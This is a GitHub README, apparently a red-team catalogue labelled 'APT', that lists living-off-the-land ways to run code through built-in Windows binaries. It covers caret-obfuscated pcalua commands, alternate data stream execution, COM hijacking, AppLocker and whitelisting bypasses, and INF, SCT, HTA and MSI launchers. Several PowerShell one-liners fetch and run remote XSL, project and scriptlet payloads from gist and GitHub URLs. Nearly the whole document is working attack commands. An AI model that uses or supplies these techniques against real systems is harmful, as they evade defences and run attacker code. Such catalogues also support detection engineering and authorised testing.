
homjxi0e / LOLBAS222

Licence: other
APT || Execution || Launch || APTs || ( Authors harr0ey, bohops )


####################### | # | APT # | # #######################

( 1 ) Use Pcalua (command line obfuscated with cmd.exe caret (^) escape characters)

p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a
^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe

( 2 ) Alternate Data Streams (ADS):>

cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2

( 3 ) pnputil.exe launcher for .INF:> Note: everything here for .INF works with my INFScript script only!

pnputil.exe /add-driver C:\FilesINFExecution.inf /install

&- My INFScript code (command-line injection)
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 4 ) INFDefaultInstall launches and executes the INFScript

INFDefaultInstall.exe C:\INFPS.inf
&- INFScript code
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 5 ) setupapi.dll launches and executes my INFScript

setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&- INFScript code
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 6 ) DLL execution using ( Reflection ) in CPLEx AccessibilityCPL RegServer

&- Add values under HKLM for the ms-settings file name in Open/Shell/Command
&- rundll32 accessibilitycpl.dll,DllRegisterServer
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\System32\desk.cpl"

( 7 ) Lua language in .wlua files

wlua.exe C:\testing.wlua
&- My Lua code: Hello World executable
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua

( 8 ) SCT scriptlet execution in my INFScript

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw code
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

( 9 ) JScript code execution via ( Eval, VSA )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Execution code
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript

( 10 ) MSI Launch Execution ( MsiExec.exe )

msiexec.exe /passive /i C:\testing.msi /norestart
&- MSI file: Hello World executable packaged as .MSI

( 10v1 ) COM (Component Object Model) Hijacking

&- Add the registry entries to the system
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- You can now invoke the CLSID via xwizard.exe
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

( 10v2 ) Execute VBScript via mshta.exe

&- Execute VBScript code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC

( 10v3 ) forfiles.exe execution (the /c command is run once per matching file)

forfiles.exe /c calc.exe

( 10v4 ) PowerShell scriptlet COM object hijacking via System.Activator

$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c

( 10v5 ) ScriptRunner.exe execution

ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe

( 10v6 ) msdt.exe executes EXE/MSI via an XML answer file, launched by Pcwrun.exe

msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
&- Link to the PCW8E57.xml file
https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87

( 10v7 ) Launch MSI package execution via PowerShell

Install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi

( 10v8 ) DLL execution from the command line: pcwutl.dll LaunchApplication

rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe

( 10v9 ) HTA/MSI execution using OpenWith.exe

Whitelisting/SRP bypass using OpenWith.exe to launch HTA/MSI execution
&- OpenWith.exe /c C:\test.hta 
&- OpenWith.exe /c C:\testing.msi

( 10v11 ) XrML digital license (.xrm-ms) ActiveX

iexplore C:\test.xrm-ms
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3

( 10v12 ) Internet Shortcut (.url) file launched via start

start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc

( 10v13 ) ActiveX execution using an SVG document

iexplore C:\PoC.svg
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0

( 10v14 ) Dxcap.exe abuse

Dxcap.exe -c C:\Windows\System32\notepad.exe

(Note) Credit: @bohops. ( 11 ) HTA launch execution ( url.dll )

Rundll32.exe url.dll,OpenURL <HTA file, or anything else>

( 12 ) SCT launch execution inside INFScript ( ieadvpack.dll )

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, 

( 13 ) XML launch execution via Reflection.Assembly in PowerShell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

( 14 ) CSharp launch execution via Reflection.Assembly in PowerShell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); $e=new-object Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();

( 15 ) SCT execution via INFScript by ( advpack.dll )

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

( 16 ) XML launch execution via XML reader and XSL transform objects in PowerShell

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

( 17 ) SCT launch execution via Reflection.Assembly ( Microsoft.VisualBasic )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …').Exec(0)

( 18 ) SCT launch execution via Reflection.Assembly ( Microsoft.JScript )

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct …").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

( 19 ) Command-line launch execution, AppLocker bypass via ( CL_LoadAssembly )

import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe

( 20 ) HTA launch execution via ( shdocvw.dll )

rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

( 21 ) HTA launch execution via ( ieframe.dll )

rundll32.exe ieframe.dll, OpenURL <path to local URL file>

( 22 ) Command-line execution via Vshadow.exe

Vshadow exec calc.exe

( 23 ) CSharp execution via ProjectInstance (Reflection.Assembly) in PowerShell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()